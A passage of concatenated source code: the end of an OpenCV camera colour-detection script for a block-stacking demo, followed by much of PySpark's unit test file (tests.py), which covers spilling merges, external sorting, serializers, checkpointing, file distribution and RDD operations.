draw_color = range_rgb["red"]
elif color == 2:
detect_color = 'green'
draw_color = range_rgb["green"]
elif color == 3:
detect_color = 'blue'
draw_color = range_rgb["blue"]
else:
detect_color = 'None'
draw_color = range_rgb["black"]
else:
if not start_pick_up:
draw_color = (0, 0, 0)
detect_color = "None"
if move_square:
cv2.putText(img, "Make sure no blocks in the stacking area", (15, int(img.shape[0]/2)), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (0, 0, 255), 2)
cv2.putText(img, "Color: " + detect_color, (10, img.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.65, draw_color, 2)
return img
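# Standalone demo: open the camera, run the detection pipeline on every frame,
# display the annotated image, and exit when ESC (key code 27) is pressed.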
if __name__ == '__main__':
init()
start()
my_camera = Camera.Camera()
my_camera.camera_open()
while True:
img = my_camera.frame
if img is not None:
frame = img.copy()
Frame = run(frame)
cv2.imshow('Frame', Frame)
key = cv2.waitKey(1)
if key == 27:
break
my_camera.camera_close()
cv2.destroyAllWindows()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
import hashlib
from py4j.protocol import Py4JJavaError
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
if sys.version_info[0] >= 3:
xrange = range
basestring = str
if sys.version >= "3":
from io import StringIO
else:
from StringIO import StringIO
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.rdd import RDD
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer, CompressedSerializer, UTF8Deserializer, NoOpSerializer, \
PairDeserializer, CartesianDeserializer, AutoBatchedSerializer, AutoSerializer, \
FlattenedValuesSerializer
from pyspark.shuffle import Aggregator, ExternalMerger, ExternalSorter
from pyspark import shuffle
from pyspark.profiler import BasicProfiler
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
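# MergerTests drives ExternalMerger directly: small memory limits force it to
# spill to disk, and the assertions check the merged results are unaffected.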
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 12
self.l = [i for i in xrange(self.N)]
self.data = list(zip(self.l, self.l))
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda x_y1: (x_y1[0], [x_y1[1]]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 20)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda x_y2: (x_y2[0], [x_y2[1]]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.items()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 5, partitions=3)
m.mergeCombiners(map(lambda k_v: (k_v[0], [str(k_v[1])]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m.items()),
self.N * 10)
m._cleanup()
def test_group_by_key(self):
def gen_data(N, step):
for i in range(1, N + 1, step):
for j in range(i):
yield (i, [j])
def gen_gs(N, step=1):
return shuffle.GroupByKey(gen_data(N, step))
self.assertEqual(1, len(list(gen_gs(1))))
self.assertEqual(2, len(list(gen_gs(2))))
self.assertEqual(100, len(list(gen_gs(100))))
self.assertEqual(list(range(1, 101)), [k for k, _ in gen_gs(100)])
self.assertTrue(all(list(range(k)) == list(vs) for k, vs in gen_gs(100)))
for k, vs in gen_gs(50002, 10000):
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
ser = PickleSerializer()
l = ser.loads(ser.dumps(list(gen_gs(50002, 30000))))
for k, vs in l:
self.assertEqual(k, len(vs))
self.assertEqual(list(range(k)), list(vs))
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = list(range(1024))
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
class CustomizedSorter(ExternalSorter):
def _next_limit(self):
return self.memory_limit
l = list(range(1024))
random.shuffle(l)
sorter = CustomizedSorter(1)
self.assertEqual(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEqual(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = list(range(10240))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from pickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEqual(p1, p2)
from pyspark.cloudpickle import dumps
P2 = loads(dumps(P))
p3 = P2(1, 3)
self.assertEqual(p1, p3)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEqual(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.__code__.co_names)
ser.dumps(foo)
def test_compressed_serializer(self):
ser = CompressedSerializer(PickleSerializer())
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
io = StringIO()
ser.dump_stream(["abc", u"123", range(5)], io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)], list(ser.load_stream(io)))
ser.dump_stream(range(1000), io)
io.seek(0)
self.assertEqual(["abc", u"123", range(5)] + list(range(1000)), list(ser.load_stream(io)))
io.close()
def test_hash_serializer(self):
hash(NoOpSerializer())
hash(UTF8Deserializer())
hash(PickleSerializer())
hash(MarshalSerializer())
hash(AutoSerializer())
hash(BatchedSerializer(PickleSerializer()))
hash(AutoBatchedSerializer(MarshalSerializer()))
hash(PairDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CartesianDeserializer(NoOpSerializer(), UTF8Deserializer()))
hash(CompressedSerializer(PickleSerializer()))
hash(FlattenedValuesSerializer(PickleSerializer()))
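# Context manager that temporarily raises the root log4j level to FATAL so that
# tests which deliberately trigger Java-side errors do not flood the output.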
class QuietTest(object):
def __init__(self, sc):
self.log4j = sc._jvm.org.apache.log4j
def __enter__(self):
self.old_level = self.log4j.LogManager.getRootLogger().getLevel()
self.log4j.LogManager.getRootLogger().setLevel(self.log4j.Level.FATAL)
def __exit__(self, exc_type, exc_val, exc_tb):
self.log4j.LogManager.getRootLogger().setLevel(self.old_level)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEqual([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
def func(x):
from userlibrary import UserClass
return UserClass().hello()
with QuietTest(self.sc):
self.assertRaises(Exception, self.sc.parallelize(range(2)).map(func).first)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEqual("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1.zip")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_range(self):
self.assertEqual(self.sc.range(1, 1).count(), 0)
self.assertEqual(self.sc.range(1, 0, -1).count(), 1)
self.assertEqual(self.sc.range(0, 1 << 40, 1 << 39).count(), 2)
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_empty_rdd(self):
rdd = self.sc.emptyRDD()
self.assertTrue(rdd.isEmpty())
def test_sum(self):
self.assertEqual(0, self.sc.emptyRDD().sum())
self.assertEqual(6, self.sc.parallelize([1, 2, 3]).sum())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode("utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = b''.join(open(p, 'rb').read()
for p in glob(tempFile.name + "/part-0000*"))
self.assertEqual(x, raw_contents.strip().decode('utf8'))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda x_y3: x_y3[0] + x_y3[1]).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize([u"Hello", u"World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual(u"Hello World!", x.strip())
self.assertEqual(u"Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(xrange(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def test_aggregate_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregate and treeAggregate to build dict
# representing a counter of ints
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
# Show that single or multiple partitions work
data1 = self.sc.range(10, numSlices=1)
data2 = self.sc.range(10, numSlices=2)
def seqOp(x, y):
x[y] += 1
return x
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
counts1 = data1.aggregate(defaultdict(int), seqOp, comboOp)
counts2 = data2.aggregate(defaultdict(int), seqOp, comboOp)
counts3 = data1.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
counts4 = data2.treeAggregate(defaultdict(int), seqOp, comboOp, 2)
ground_truth = defaultdict(int, dict((i, 1) for i in range(10)))
self.assertEqual(counts1, ground_truth)
self.assertEqual(counts2, ground_truth)
self.assertEqual(counts3, ground_truth)
self.assertEqual(counts4, ground_truth)
def test_aggregate_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses aggregateByKey to make a pair RDD that
# contains lists of all values for each key in the original RDD
# list(range(...)) for Python 3.x compatibility (can't use * operator
# on a range object)
# list(zip(...)) for Python 3.x compatibility (want to parallelize a
# collection, not a zip object)
tuples = list(zip(list(range(10))*2, [1]*20))
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def seqOp(x, y):
x.append(y)
return x
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.aggregateByKey([], seqOp, comboOp).collect()
values2 = data2.aggregateByKey([], seqOp, comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
ground_truth = [(i, [1]*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_fold_mutable_zero_value(self):
# Test for SPARK-9021; uses fold to merge an RDD of dict counters into
# a single dict
# NOTE: dict is used instead of collections.Counter for Python 2.6
# compatibility
from collections import defaultdict
counts1 = defaultdict(int, dict((i, 1) for i in range(10)))
counts2 = defaultdict(int, dict((i, 1) for i in range(3, 8)))
counts3 = defaultdict(int, dict((i, 1) for i in range(4, 7)))
counts4 = defaultdict(int, dict((i, 1) for i in range(5, 6)))
all_counts = [counts1, counts2, counts3, counts4]
# Show that single or multiple partitions work
data1 = self.sc.parallelize(all_counts, 1)
data2 = self.sc.parallelize(all_counts, 2)
def comboOp(x, y):
for key, val in y.items():
x[key] += val
return x
fold1 = data1.fold(defaultdict(int), comboOp)
fold2 = data2.fold(defaultdict(int), comboOp)
ground_truth = defaultdict(int)
for counts in all_counts:
for key, val in counts.items():
ground_truth[key] += val
self.assertEqual(fold1, ground_truth)
self.assertEqual(fold2, ground_truth)
def test_fold_by_key_mutable_zero_value(self):
# Test for SPARK-9021; uses foldByKey to make a pair RDD that contains
# lists of all values for each key in the original RDD
tuples = [(i, range(i)) for i in range(10)]*2
# Show that single or multiple partitions work
data1 = self.sc.parallelize(tuples, 1)
data2 = self.sc.parallelize(tuples, 2)
def comboOp(x, y):
x.extend(y)
return x
values1 = data1.foldByKey([], comboOp).collect()
values2 = data2.foldByKey([], comboOp).collect()
# Sort lists to ensure clean comparison with ground_truth
values1.sort()
values2.sort()
# list(range(...)) for Python 3.x compatibility
ground_truth = [(i, list(range(i))*2) for i in range(10)]
self.assertEqual(values1, ground_truth)
self.assertEqual(values2, ground_truth)
def test_aggregate_by_key(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEqual([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 10000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 27MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEqual(N, m)
def test_multiple_broadcasts(self):
N = 1 << 21
b1 = self.sc.broadcast(set(range(N))) # multiple blocks in JVM
r = list(range(1 << 15))
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
random.shuffle(r)
s = str(r).encode()
checksum = hashlib.md5(s).hexdigest()
b2 = self.sc.broadcast(s)
r = list(set(self.sc.parallelize(range(10), 10).map(
lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
self.assertEqual(1, len(r))
size, csum = r[0]
self.assertEqual(N, size)
self.assertEqual(checksum, csum)
def test_large_closure(self):
N = 200000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEqual(N, rdd.first())
# regression test for SPARK-6886
self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count())
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
# regression test for SPARK-4841
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
t = self.sc.textFile(path)
cnt = t.count()
self.assertEqual(cnt, t.zip(t).count())
rdd = t.map(str)
self.assertEqual(cnt, t.zip(rdd).count())
# regression test for bug in _reserializer()
self.assertEqual(cnt, t.zip(rdd).count())
def test_zip_with_different_object_sizes(self):
# regress test for SPARK-5973
a = self.sc.parallelize(xrange(10000)).map(lambda i: '*' * i)
b = self.sc.parallelize(xrange(10000, 20000)).map(lambda i: '*' * i)
self.assertEqual(10000, a.zip(b).count())
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
with QuietTest(self.sc):
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEqual(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(xrange(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0], rdd.histogram([0, 10])[1])
self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual([4], rdd.histogram([0, 10])[1])
self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEqual([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEqual(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEqual(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEqual((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEqual(rdd.getNumPartitions(), 10)
self.assertEqual(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEqual(result.getNumPartitions(), 5)
self.assertEqual(result.count(), 3)
def test_external_group_by_key(self):
self.sc._conf.set("spark.python.worker.memory", "1m")
N = 200001
kv = self.sc.parallelize(xrange(N)).map(lambda x: (x % 3, x))
gkv = kv.groupByKey().cache()
self.assertEqual(3, gkv.count())
filtered = gkv.filter(lambda kv: kv[0] == 1)
self.assertEqual(1, filtered.count())
self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect())
self.assertEqual([(N // 3, N // 3)],
filtered.values().map(lambda x: (len(x), len(list(x)))).collect())
result = filtered.collect()[0][1]
self.assertEqual(N // 3, len(result))
self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList))
def test_sort_on_empty_rdd(self):
self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect())
def test_sample(self):
rdd = self.sc.parallelize(range(0, 100), 4)
wo = rdd.sample(False, 0.1, 2).collect()
